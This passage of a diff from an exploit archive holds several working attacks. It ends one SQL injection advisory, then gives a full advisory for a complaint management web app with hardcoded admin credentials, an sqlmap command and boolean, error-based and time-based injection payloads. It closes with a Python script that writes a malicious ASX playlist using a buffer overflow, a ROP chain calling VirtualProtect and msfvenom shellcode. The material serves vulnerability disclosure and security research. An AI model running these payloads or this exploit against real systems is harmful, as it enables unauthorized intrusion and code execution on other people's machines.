Payload: https://localhost/[path]/videos/[category]' AND 5593=5593 AND 'LJPS'='LJPS
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: https://localhost/[path]/videos/[category]' AND SLEEP(5) AND 'xNCN'='xNCN
==================
8bitsec - [https://twitter.com/_8bitsec]

58
platforms/php/webapps/42968.txt Executable file
View file

@ -0,0 +1,58 @@
# Exploit Title : Complain Management System Blind SQL Injection
# Date: 10 October 2017
# Exploit Author: havysec
# Tested on: ubuntu14.04
# Vendor: https://sourceforge.net/projects/complain-management-system/
# Version: not supplied
# Download Software: https://sourceforge.net/projects/complain-management-system/files
## About The Product :
Complain Management is a Web based project used to manage Customer's complain Online. User can login, and Create complain, view complain details and track the status of its complain.
## Vulnerability :
The functions.php file line 88 has hardcoded admin credentials.
elseif($uType == 'admin'){
//$_SESSION['user_id'] = $row['sid'];
if($userName == 'admin' && $password == 'admin123'){
$_SESSION['user_id'] = 0;
$_SESSION['user_name'] = 'Administrator';
$_SESSION['user_type'] = 'admin';
header('Location: '.WEB_ROOT.'index.php');
exit;
Using the hardcoded admin credentials we then have access to the view.php file that is vulnerable to Blind SQL injection.
-HTTP Method : GET
- Sqlmap command: sqlmap -u 'http://192.168.1.104/view.php?mod=admin&view=repod&id=plans' --cookie="PHPSESSID=t1bc9vj67odrj3bd096g0rffe0"
- Sqlmap Output :
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[00:47:53] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[00:47:53] [INFO] testing 'MySQL UNION query (98) - 22 to 40 columns'
[00:47:53] [INFO] testing 'MySQL UNION query (98) - 42 to 60 columns'
[00:47:53] [INFO] testing 'MySQL UNION query (98) - 62 to 80 columns'
[00:47:54] [INFO] testing 'MySQL UNION query (98) - 82 to 100 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 650 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: mod=admin&view=repod&id=plans WHERE 6586=6586 AND 9310=9310#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: mod=admin&view=repod&id=plans WHERE 3317=3317 AND (SELECT 4063 FROM(SELECT COUNT(*),CONCAT(0x7176767a71,(SELECT (ELT(4063=4063,1))),0x7170766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)--
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: mod=admin&view=repod&id=plans WHERE 4122=4122 AND (SELECT * FROM (SELECT(SLEEP(5)))zWVH)--
---
[00:47:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0
[00:47:57] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 444 times

View file

@ -0,0 +1,83 @@
import struct,sys
head ='''<ASX version="3.0">
<Entry>
<REF HREF="mms://site.com/ach/music/smpl/LACA-05928-002-tes_'''
#offset 17375
junk = "A" *17375
#0x1003df8e
#0x774e1035
EIP="\x36\x10\x4e\x77"
adjust="A" *4
def create_rop_chain():
rop_gadgets = [
0x73dd5dce, # POP EAX # RETN [MFC42.DLL]
0x5d091368, # ptr to &VirtualProtect() [IAT COMCTL32.dll]
0x7608708e, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSVCP60.dll]
0x73dd40f1, # XCHG EAX,ESI # RETN [MFC42.DLL]
0x7c96feb7, # POP EBP # RETN [ntdll.dll]
0x7608fcec, # & push esp # ret [MSVCP60.dll]
0x01c395d4, # POP EAX # RETN [MSA2Mcodec00.dll]
0xfffffdff, # Value to negate, will become 0x00000201
0x77d74960, # NEG EAX # RETN [USER32.dll]
0x7ca485b4, # XCHG EAX,EBX # RETN [SHELL32.dll]
0x01d64827, # POP EAX # RETN [msvos.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x77d74960, # NEG EAX # RETN [USER32.dll]
0x71ab9b46, # XCHG EAX,EDX # RETN [WS2_32.dll]
0x1003fd11, # POP ECX # RETN [MSA2Mfilter03.dll]
0x77da1d04, # &Writable location [USER32.dll]
0x01d34691, # POP EDI # RETN [MSA2Mctn01.dll]
0x76091182, # RETN (ROP NOP) [MSVCP60.dll]
0x7d7da123, # POP EAX # RETN [WMVCore.DLL]
0x90909090, # nop
0x77195015, # PUSHAD # RETN [OLEAUT32.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
#msfvenom -a x86 --platform Windows -p windows/exec cmd=calc.exe -f python -b "\x00\x0a\x0d EXITFUNC=seh
#badcharacters "\x00\x0a\x0d"
buf = ""
buf += "\xda\xd6\xba\xf5\xa4\x32\xf4\xd9\x74\x24\xf4\x5d\x31"
buf += "\xc9\xb1\x31\x83\xc5\x04\x31\x55\x14\x03\x55\xe1\x46"
buf += "\xc7\x08\xe1\x05\x28\xf1\xf1\x69\xa0\x14\xc0\xa9\xd6"
buf += "\x5d\x72\x1a\x9c\x30\x7e\xd1\xf0\xa0\xf5\x97\xdc\xc7"
buf += "\xbe\x12\x3b\xe9\x3f\x0e\x7f\x68\xc3\x4d\xac\x4a\xfa"
buf += "\x9d\xa1\x8b\x3b\xc3\x48\xd9\x94\x8f\xff\xce\x91\xda"
buf += "\xc3\x65\xe9\xcb\x43\x99\xb9\xea\x62\x0c\xb2\xb4\xa4"
buf += "\xae\x17\xcd\xec\xa8\x74\xe8\xa7\x43\x4e\x86\x39\x82"
buf += "\x9f\x67\x95\xeb\x10\x9a\xe7\x2c\x96\x45\x92\x44\xe5"
buf += "\xf8\xa5\x92\x94\x26\x23\x01\x3e\xac\x93\xed\xbf\x61"
buf += "\x45\x65\xb3\xce\x01\x21\xd7\xd1\xc6\x59\xe3\x5a\xe9"
buf += "\x8d\x62\x18\xce\x09\x2f\xfa\x6f\x0b\x95\xad\x90\x4b"
buf += "\x76\x11\x35\x07\x9a\x46\x44\x4a\xf0\x99\xda\xf0\xb6"
buf += "\x9a\xe4\xfa\xe6\xf2\xd5\x71\x69\x84\xe9\x53\xce\x74"
buf += "\x1b\x6e\xda\xe1\x82\x1b\xa7\x6f\x35\xf6\xeb\x89\xb6"
buf += "\xf3\x93\x6d\xa6\x71\x96\x2a\x60\x69\xea\x23\x05\x8d"
buf += "\x59\x43\x0c\xee\x3c\xd7\xcc\xdf\xdb\x5f\x76\x20"
shellcode="S"*10+buf
print "Length of shellcode is:",len(shellcode)
print "Length of ropchain is:",len(rop_chain)
print"Calculating Garbage:",(26000-17375-4-4-len(shellcode)-len(rop_chain))
garbage= "C" *8303
foot ='''_playlis.wma"/>
</Entry>
</ASX>'''
payload=head+junk+EIP+adjust+rop_chain+shellcode+garbage+foot
fobj = open("exploit.asx","w")
fobj.write(payload)
fobj.close()